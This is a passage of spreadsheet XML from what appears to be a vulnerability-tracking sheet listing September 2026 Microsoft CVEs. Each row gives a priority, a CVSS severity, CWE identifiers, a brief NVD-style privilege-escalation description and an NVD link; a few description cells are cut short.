      </c>
      <c r="S921" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69394</t>
        </is>
      </c>
      <c r="D922" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F922" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G922" s="5" t="inlineStr"/>
      <c r="H922" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I922" s="5" t="inlineStr"/>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr"/>
      <c r="L922" s="5" t="inlineStr"/>
      <c r="M922" s="5" t="inlineStr"/>
      <c r="N922" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O922" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P922" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q922" s="5" t="inlineStr"/>
      <c r="R922" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S922" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69398</t>
        </is>
      </c>
      <c r="D923" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F923" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G923" s="5" t="inlineStr"/>
      <c r="H923" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I923" s="5" t="inlineStr"/>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr"/>
      <c r="L923" s="5" t="inlineStr"/>
      <c r="M923" s="5" t="inlineStr"/>
      <c r="N923" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O923" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P923" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q923" s="5" t="inlineStr"/>
      <c r="R923" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-415</t>
        </is>
      </c>
      <c r="S923" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69401</t>
        </is>
      </c>
      <c r="D924" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F924" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G924" s="5" t="inlineStr"/>
      <c r="H924" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I924" s="5" t="inlineStr"/>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr"/>
      <c r="L924" s="5" t="inlineStr"/>
      <c r="M924" s="5" t="inlineStr"/>
      <c r="N924" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O924" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P924" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q924" s="5" t="inlineStr"/>
      <c r="R924" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S924" s="5" t="inlineStr">
        <is>
          <t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69404</t>
        </is>
      </c>
      <c r="D925" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F925" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G925" s="5" t="inlineStr"/>
      <c r="H925" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I925" s="5" t="inlineStr"/>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr"/>
      <c r="L925" s="5" t="inlineStr"/>
      <c r="M925" s="5" t="inlineStr"/>
      <c r="N925" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O925" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P925" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q925" s="5" t="inlineStr"/>
      <c r="R925" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S925" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69410</t>
        </is>
      </c>
      <c r="D926" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F926" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G926" s="5" t="inlineStr"/>
      <c r="H926" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I926" s="5" t="inlineStr"/>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr"/>
      <c r="L926" s="5" t="inlineStr"/>
      <c r="M926" s="5" t="inlineStr"/>
      <c r="N926" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O926" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P926" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q926" s="5" t="inlineStr"/>
      <c r="R926" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S926" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="D927" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F927" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G927" s="5" t="inlineStr"/>
      <c r="H927" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I927" s="5" t="inlineStr"/>
      <c r="J927" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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27" s="5" t="inlineStr"/>
      <c r="M927" s="5" t="inlineStr"/>
      <c r="N927" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P927" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q927" s="5" t="inlineStr"/>
      <c r="R927" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S927" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="D928" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F928" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G928" s="5" t="inlineStr"/>
      <c r="H928" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I928" s="5" t="inlineStr"/>
      <c r="J928" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K928" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L928" s="5" t="inlineStr"/>
      <c r="M928" s="5" t="inlineStr"/>
      <c r="N928" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P928" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q928" s="5" t="inlineStr"/>
      <c r="R928" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S928" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69430</t>
        </is>
      </c>
      <c r="D929" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F929" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I929" s="5" t="inlineStr"/>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr"/>
      <c r="L929" s="5" t="inlineStr"/>
      <c r="M929" s="5" t="inlineStr"/>
      <c r="N929" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P929" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q929" s="5" t="inlineStr"/>
      <c r="R929" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S929" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69440</t>
        </is>
      </c>
      <c r="D930" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F930" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G930" s="5" t="inlineStr"/>
      <c r="H930" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I930" s="5" t="inlineStr"/>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr"/>
      <c r="L930" s="5" t="inlineStr"/>
      <c r="M930" s="5" t="inlineStr"/>
      <c r="N930" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O930" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P930" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q930" s="5" t="inlineStr"/>
      <c r="R930" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S930" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69441</t>
        </is>
      </c>
      <c r="D931" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F931" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G931" s="5" t="inlineStr"/>
      <c r="H931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I931" s="5" t="inlineStr"/>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr"/>
      <c r="L931" s="5" t="inlineStr"/>
      <c r="M931" s="5" t="inlineStr"/>
      <c r="N931" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P931" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q931" s="5" t="inlineStr"/>
      <c r="R931" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S931" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69448</t>
        </is>
      </c>
      <c r="D932" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F932" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G932" s="5" t="inlineStr"/>
      <c r="H932" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I932" s="5" t="inlineStr"/>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr"/>
      <c r="L932" s="5" t="inlineStr"/>
      <c r="M932" s="5" t="inlineStr"/>
      <c r="N932" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O932" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P932" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q932" s="5" t="inlineStr"/>
      <c r="R932" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S932" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69466</t>
        </is>
      </c>
      <c r="D933" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F933" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G933" s="5" t="inlineStr"/>
      <c r="H933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I933" s="5" t="inlineStr"/>
      <c r="J933" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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33" s="5" t="inlineStr"/>
      <c r="M933" s="5" t="inlineStr"/>
      <c r="N933" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O933" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P933" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q933" s="5" t="inlineStr"/>
      <c r="R933" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S933" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69468</t>
        </is>
      </c>
      <c r="D934" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E934" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F934" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I934" s="5" t="inlineStr"/>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr"/>
      <c r="L934" s="5" t="inlineStr"/>
      <c r="M934" s="5" t="inlineStr"/>
      <c r="N934" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P934" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q934" s="5" t="inlineStr"/>
      <c r="R934" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S934" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69470</t>
        </is>
      </c>
      <c r="D935" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F935" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G935" s="5" t="inlineStr"/>
      <c r="H935" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I935" s="5" t="inlineStr"/>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr"/>
      <c r="L935" s="5" t="inlineStr"/>
      <c r="M935" s="5" t="inlineStr"/>
      <c r="N935" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O935" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P935" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q935" s="5" t="inlineStr"/>
      <c r="R935" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S935" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69472</t>
        </is>
      </c>
      <c r="D936" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F936" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I936" s="5" t="inlineStr"/>
      <c r="J936" s="5" t="inlineStr"/>
      <c r="K936" s="5" t="inlineStr"/>
      <c r="L936" s="5" t="inlineStr"/>
      <c r="M936" s="5" t="inlineStr"/>
      <c r="N936" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O936" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P936" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q936" s="5" t="inlineStr"/>
      <c r="R936" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S936" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69473</t>
        </is>
      </c>
      <c r="D937" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F937" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G937" s="5" t="inlineStr"/>
      <c r="H937" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I937" s="5" t="inlineStr"/>
      <c r="J937" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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37" s="5" t="inlineStr"/>
      <c r="M937" s="5" t="inlineStr"/>
      <c r="N937" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O937" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P937" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q937" s="5" t="inlineStr"/>
      <c r="R937" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S937" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69488</t>
        </is>
      </c>
      <c r="D938" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F938" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I938" s="5" t="inlineStr"/>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr"/>
      <c r="L938" s="5" t="inlineStr"/>
      <c r="M938" s="5" t="inlineStr"/>
      <c r="N938" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O938" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P938" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q938" s="5" t="inlineStr"/>
      <c r="R938" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S938" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69492</t>
        </is>
      </c>
      <c r="D939" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F939" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I939" s="5" t="inlineStr"/>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr"/>
      <c r="L939" s="5" t="inlineStr"/>
